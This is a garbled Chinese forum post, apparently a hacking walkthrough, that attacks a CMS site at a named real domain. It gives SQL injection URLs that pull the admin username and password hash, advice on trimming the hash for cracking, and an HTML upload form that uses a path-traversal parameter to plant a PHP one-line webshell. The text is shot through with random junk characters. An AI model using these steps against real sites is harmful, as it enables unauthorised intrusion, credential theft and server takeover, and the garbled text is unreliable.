①注入漏洞。# y! O* E- E- ?: h5 x
这站 http://www.political-security.com/
, W7 o- t1 D$ J; h- K首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,% y+ o& ?8 ~' K; V) v% C4 |
www.political-security.com/data/mysql_error_trace.inc 爆后台
; s8 A( ^3 c$ q5 t6 ^- v) q- g0 L然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。, N3 Q- {4 e: M- V) r
然后写上语句
; ~. C% H5 K. z查看管理员帐号5 O2 z- W7 W" P/ ], w1 l
http://www.political-security.co ... &membergroup=@`
( y- a" x) H5 \8 N8 r! J5 T
4 q- a6 T3 ?' A6 radmin ) B$ U# L: Y+ I; F/ y1 Q- c
+ {' B& x1 M( n: Q5 a5 w8 u查看管理员密码8 v: _% m- j u* O. a8 w! X
http://www.political-security.co ... &membergroup=@`
4 M) _7 U2 N6 b
; w5 i) N* F; L5 E0 H4 y8d29b1ef9f8c5a5af429
0 E+ r# f# b F7 W; n9 M% i; J& V5 q3 ?: H
查看管理员密码( u* j) H& `7 N
0 _$ S) m: n; Q" T0 {6 T& t1 }4 }6 h
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5: m4 C7 v. U/ F1 W+ t# w
' z: k4 W& d" Y1 R% ~8d2
) ~3 Z; b8 F& w2 L; a9b1ef9f8c5a5af42
) S' `8 M$ S# j( `" u9* J4 M, k8 ~$ y+ o+ O
# K N6 W8 @& X& c! B6 m& Q: G+ Mcmd5没解出来 只好测试第二个方法8 Q* ^2 R, e+ s) w+ X
8 z- W! J* D4 L: K" w) B5 Z+ U$ J
; G/ G/ m$ L! m# A②上传漏洞:3 q {# q. S$ P9 ]5 O! a' L0 y# c
# p y# u$ v" g
只要登陆会员中心,然后访问页面链接
/ R! T/ ]- W, M `) ]0 W/ F% c, x' ~“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”4 o5 A/ _" F$ t$ J8 P+ d. ]
, ?0 Y' \1 r! s" J8 Q7 {
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”! `1 }, g3 W* v) M# Y
2 S* f8 ]( h' @( s. e- _2 t4 n于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm% J. b* J8 j) W4 X4 R# a" O
; `9 E, Q9 w8 j7 D- _! y
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>3 H+ [. O" Z* b. K2 X# \
或者
- G6 ]! c& n6 ~/ Q% X; k- W即可上传成功 |